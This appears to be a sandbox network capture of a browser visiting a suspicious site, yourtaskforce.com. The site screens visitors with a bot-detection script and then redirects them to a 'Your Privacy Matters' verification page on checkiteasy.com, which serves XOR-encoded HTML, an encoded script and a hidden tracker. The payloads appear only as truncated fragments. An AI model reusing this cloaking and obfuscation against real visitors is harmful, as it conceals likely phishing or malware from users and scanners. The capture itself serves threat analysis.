                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://6p205g.ar.yourtaskforce.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:20 UTC | 373 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:20 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-12-23 14:21:20 UTC | 242 | IN
                                                Data Ascii: e7<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Just a moment...</title> <link rel="icon" type="image/x-icon" href="favicon.ico"> <script src="?_js=_1"></script></head><body></body></html>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.5 | 49737 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:20 UTC | 358 | OUT | GET /?_js=_1 HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:20 UTC | 378 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:20 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/javascript;charset=UTF-8
                                                2024-12-23 14:21:20 UTC | 941 | IN
                                                Data Ascii: 3a1const currentURL = new URL(window.location.href);const baseURL = `${currentURL.origin}${currentURL.pathname}`;const newURL = `${baseURL}?_jd=botd`;import(newURL).then((_b) => _b.load()).then((_b) => _b.detect()).then((_r) => { let value;


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.5 | 49743 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:22 UTC | 362 | OUT | GET /favicon.ico HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:22 UTC | 373 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:22 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-12-23 14:21:22 UTC | 242 | IN
                                                Data Ascii: e7<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Just a moment...</title> <link rel="icon" type="image/x-icon" href="favicon.ico"> <script src="?_js=_1"></script></head><body></body></html>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.5 | 49744 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:22 UTC | 360 | OUT | GET /?_jd=botd HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:22 UTC | 378 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:22 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/javascript;charset=UTF-8
                                                2024-12-23 14:21:22 UTC | 7814 | IN
                                                Data Ascii: 1f20/** * Fingerprint BotD v1.9.1 - Copyright (c) FingerprintJS, Inc, 2024 (https://fingerprint.com) * Licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) license. */var e=function(n,t){return e=Object.setPrototypeOf||{__prot
                                                2024-12-23 14:21:22 UTC | 160 | IN
                                                Data Ascii: sCaptureMediaStream"in t])>=4?"gecko":"unknown"}var p={android:function(){var e=m(),n="chromium"===e,t="gecko"===e;if(!n&&!t)return!1;var r=window;return v(["on
                                                2024-12-23 14:21:22 UTC | 2 | IN | Data Raw: 0d 0a
                                                Data Ascii:
                                                2024-12-23 14:21:22 UTC | 7241 | IN
                                                Data Ascii: 1c3corientationchange"in r,"orientation"in r,n&&!("SharedWorker"in r),t&&/android/i.test(navigator.appVersion)])>=2},browserKind:function(){var e,n=null===(e=navigator.userAgent)||void 0===e?void 0:e.toLowerCase();return c(n,"edg/")?"edge":c(n,"trident"


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.5 | 49745 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:22 UTC | 864 | OUT | POST / HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                Content-Length: 6
                                                Cache-Control: max-age=0
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                Origin: https://6p205g.ar.yourtaskforce.com
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Referer: https://6p205g.ar.yourtaskforce.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:22 UTC | 6 | OUT | Data Raw: 5f 72 3d 25 32 46
                                                Data Ascii: _r=%2F
                                                2024-12-23 14:21:22 UTC | 406 | IN | HTTP/1.1 307 Temporary Redirect
                                                Date: Mon, 23 Dec 2024 14:21:22 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                location: https://5mzcue1v.doc.checkiteasy.com/
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.5 | 49753 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:24 UTC | 833 | OUT | POST / HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                Content-Length: 6
                                                Cache-Control: max-age=0
                                                Upgrade-Insecure-Requests: 1
                                                Origin: null
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Referer: https://6p205g.ar.yourtaskforce.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:24 UTC | 6 | OUT | Data Raw: 5f 72 3d 25 32 46
                                                Data Ascii: _r=%2F
                                                2024-12-23 14:21:25 UTC | 204 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:25 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-12-23 14:21:25 UTC | 2957 | IN
                                                Data Ascii: b81<!DOCTYPE html><html><head><img src="tracker.php" alt="" style="display:none;"> <title>Your Privacy Matters</title></head><body><script> var key = "secretkey"; var encodedHtml = "T0QnPSYgMjU8Uw0XHwlKYVkRBwgPUgkVBQJEUQANUFt+Vw0cEgFdeEV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.5 | 49763 | 104.17.24.14 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:26 UTC | 590 | OUT | GET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1
                                                Host: cdnjs.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: text/css,*/*;q=0.1
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: style
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC | 948 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Content-Type: text/css; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=30672000
                                                ETag: W/"620188b3-468e"
                                                Last-Modified: Mon, 07 Feb 2022 21:01:39 GMT
                                                cf-cdnjs-via: cfworker/kv
                                                Cross-Origin-Resource-Policy: cross-origin
                                                Timing-Allow-Origin: *
                                                X-Content-Type-Options: nosniff
                                                CF-Cache-Status: HIT
                                                Age: 399232
                                                Expires: Sat, 13 Dec 2025 14:21:27 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k1%2FMQICJTLosPr6WlDWGVvPQOCsPRUQFJ253uPyWz03vEU3VZF9ZP2nKVgKFNSEot%2BIXv0IJIJvSSJxHBgC9lk3%2Fwkn9XiVLktY%2BpYZRyRLts%2Fpdtd5EHNFRwhnidkDGFUl90R8r"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                Strict-Transport-Security: max-age=15780000
                                                Server: cloudflare
                                                CF-RAY: 8f68ff85084f7c7b-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-12-23 14:21:27 UTC | 421 | IN
                                                Data Ascii: 7bfc/*! * Font Awesome Free 6.0.0 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                2024-12-23 14:21:27 UTC1369INData Raw: 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b
                                                Data Ascii: ));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-webk
                                                2024-12-23 14:21:27 UTC1369INData Raw: 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b 2d 77
                                                Data Ascii: (0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{-w
                                                2024-12-23 14:21:27 UTC1369INData Raw: 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d
                                                Data Ascii: fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}
                                                2024-12-23 14:21:27 UTC1369INData Raw: 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72
                                                Data Ascii: nsform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transfor


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.2.5 | 49759 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:26 UTC | 564 | OUT | GET /style.css HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: text/css,*/*;q=0.1
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: style
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC | 278 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Last-Modified: Fri, 20 Dec 2024 13:55:51 GMT
                                                ETag: "10ce-629b40131df37"
                                                Accept-Ranges: bytes
                                                Content-Length: 4302
                                                Vary: Accept-Encoding
                                                Content-Type: text/css
                                                2024-12-23 14:21:27 UTC | 4302 | IN
                                                Data Ascii: * { margin: 0; padding: 0; box-sizing: border-box;}body { font-family: 'Segoe UI', Arial, sans-serif; background-color: #f5f5f5; line-height: 1.6; min-height: 100vh;}.verification-container { min-height: 100vh; di


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.5 | 49760 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:26 UTC | 550 | OUT | GET /script.js HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC | 286 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Last-Modified: Sun, 22 Dec 2024 12:49:11 GMT
                                                ETag: "31e6-629db4e740e58"
                                                Accept-Ranges: bytes
                                                Content-Length: 12774
                                                Vary: Accept-Encoding
                                                Content-Type: text/javascript
                                                2024-12-23 14:21:27 UTC | 7906 | IN
                                                Data Ascii: var key = "jamesbond";var encodedScript = "Dg4OEB4HARpKCwUJIAUHARooAxIZAB0HHUZDLi4gJhwMGwsKHi0CBBcHC0lISgAeHB0BT0ZNSlxTRQhvZU5ESkEBAAdCDhsQBQYfBBEACgohBwAECVNfT0lDUWxnRVNCTw0LBBIZRRoRIgEGAw0IRU5CQAc0Ag4DAA8LPw8AFgg9ChceLgAAGA4EAVwLQRoBGRVFCxIUBgkFHg4fSwY
                                                2024-12-23 14:21:27 UTC | 4868 | IN
                                                Data Ascii: QaKRYEG05ZSiwMERtMAg8cQlVBRT4DGwZKBwgDTR0HGCIBDBVBRR4DFyIBDBVETEhvZU5ESkFNRVNCT05ESgMYEQcNAUAXHhgBAF0OCggQSlxNBVcZAQsTJgQLEQ4SFw5fZ2tNRVNCT05ESkFNRVMWHQ8HAU8eEQoOCkATAwUZDVNfTw5AEQ8IEj8HCRpEQUEPEAcWAABKCQ0EAB0WOAcAHglCVw4SFw5fZ2tgb1NCT05ESkFNRVNCTwcCSkkDA


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.5 | 49761 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:26 UTC | 612 | OUT | GET /tracker.php HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC | 172 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.5 | 49762 | 135.225.111.190 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:26 UTC | 615 | OUT | GET /image/logo.png HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://5mzcue1v.doc.checkiteasy.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:27 UTC | 255 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:27 GMT
                                                Server: Apache
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Last-Modified: Thu, 19 Dec 2024 23:39:15 GMT
                                                ETag: "421-629a809c618d9"
                                                Accept-Ranges: bytes
                                                Content-Length: 1057
                                                Content-Type: image/png


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.2.5 | 49771 | 104.17.24.14 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-23 14:21:29 UTC | 665 | OUT | GET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                Host: cdnjs.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://5mzcue1v.doc.checkiteasy.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: font
                                                Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:29 UTC | 967 | IN | HTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:29 GMT
                                                Content-Type: application/octet-stream; charset=utf-8
                                                Content-Length: 126828
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=30672000
                                                ETag: "620188b3-1ef6c"
                                                Last-Modified: Mon, 07 Feb 2022 21:01:39 GMT
                                                cf-cdnjs-via: cfworker/kv
                                                Cross-Origin-Resource-Policy: cross-origin
                                                Timing-Allow-Origin: *
                                                X-Content-Type-Options: nosniff
                                                CF-Cache-Status: MISS
                                                Expires: Sat, 13 Dec 2025 14:21:29 GMT
                                                Accept-Ranges: bytes
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6zfzc9eUQavowtYn3KKNLJ4N0DMcj%2B3XB0cxMloZAZSDDLBiYXRaoQrJBdAm5z%2BLwaenkf7vKhznKBhyKfEIlzTq5cW5HUPVA84tLJJj%2BpplxJK%2FBUFOUrvyNo6rmlXGPnKVYOl"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                Strict-Transport-Security: max-age=15780000
                                                Server: cloudflare
                                                CF-RAY: 8f68ff92cab942a9-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.2.5 | 49773 | 104.26.12.205 | 443 | 4372 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Timestamp | Bytes transferred | Direction | Data
